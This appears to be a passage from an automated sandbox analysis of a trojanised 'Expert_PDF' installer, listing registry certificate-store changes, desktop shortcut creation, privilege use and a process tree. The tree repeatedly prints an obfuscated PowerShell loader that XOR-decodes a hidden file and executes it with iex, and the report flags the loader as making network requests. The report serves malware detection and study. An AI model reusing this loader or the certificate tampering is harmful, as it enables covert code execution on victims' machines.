145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Expert_PDF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Expert_PDF.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Expert_PDF.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Expert_PDF.exe Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Expert_PDF.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Expert_PDF.exe -
NTFS ADS 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DeSKtOp\Microsoft Edge.lnkC:\Users\puBlIC\DeskTop\Acrobat Reader DC.lnk C:\Users\puBlIC\DeskTop\Firefox.lnk C:\Users\puBlIC\DeskTop\Google Chrome.lnk C:\Users\puBlIC\DeskTop\VLC media player.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Expert_PDF.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 116 Expert_PDF.exe 116 Expert_PDF.exe 3080 powershell.exe 3080 powershell.exe 4392 powershell.exe 4392 powershell.exe 5020 powershell.exe 5020 powershell.exe 1568 powershell.exe 1568 powershell.exe 1924 powershell.exe 1924 powershell.exe 4252 powershell.exe 4252 powershell.exe 3676 powershell.exe 3676 powershell.exe 2492 powershell.exe 2492 powershell.exe 2456 powershell.exe 2456 powershell.exe 980 powershell.exe 980 powershell.exe 3080 powershell.exe 1924 powershell.exe 4392 powershell.exe 3676 powershell.exe 4252 powershell.exe 1568 powershell.exe 5020 powershell.exe 2456 powershell.exe 2492 powershell.exe 980 powershell.exe 4392 powershell.exe 4392 powershell.exe 2456 powershell.exe 2456 powershell.exe 2492 powershell.exe 2492 powershell.exe 1924 powershell.exe 1924 powershell.exe 1924 powershell.exe 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe 3080 powershell.exe 4252 powershell.exe 4252 powershell.exe 2492 powershell.exe 1568 powershell.exe 1568 powershell.exe 2492 powershell.exe 2456 powershell.exe 2456 powershell.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 980 powershell.exe 980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 3080 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 980 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
07d8c9f5-af55-421d-9023-7932ab1810d7.exe07d8c9f5-af55-421d-9023-7932ab1810d7.tmpExpert_PDF.exedescription pid process target process PID 1644 wrote to memory of 3672 1644 07d8c9f5-af55-421d-9023-7932ab1810d7.exe 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp PID 1644 wrote to memory of 3672 1644 07d8c9f5-af55-421d-9023-7932ab1810d7.exe 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp PID 1644 wrote to memory of 3672 1644 07d8c9f5-af55-421d-9023-7932ab1810d7.exe 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp PID 3672 wrote to memory of 116 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp Expert_PDF.exe PID 3672 wrote to memory of 116 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp Expert_PDF.exe PID 3672 wrote to memory of 116 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp Expert_PDF.exe PID 116 wrote to memory of 2612 116 Expert_PDF.exe regsvr32.exe PID 116 wrote to memory of 2612 116 Expert_PDF.exe regsvr32.exe PID 116 wrote to memory of 2612 116 Expert_PDF.exe regsvr32.exe PID 116 wrote to memory of 1300 116 Expert_PDF.exe Expert_PDF_14_Installer.exe PID 116 wrote to memory of 1300 116 Expert_PDF.exe Expert_PDF_14_Installer.exe PID 116 wrote to memory of 1300 116 Expert_PDF.exe Expert_PDF_14_Installer.exe PID 3672 wrote to memory of 4392 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 4392 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 4392 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 4252 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 4252 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 4252 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3676 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3676 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3676 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1924 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1924 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1924 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3080 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3080 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 3080 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 5020 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 5020 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 5020 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1568 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1568 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 1568 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2492 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2492 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2492 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2456 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2456 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 2456 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 980 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 980 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe PID 3672 wrote to memory of 980 3672 07d8c9f5-af55-421d-9023-7932ab1810d7.tmp powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp"C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- Modifies registry class
PID:2612 -
C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe"C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer4⤵
- Executes dropped EXE
- Modifies registry class
PID:1300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924 -
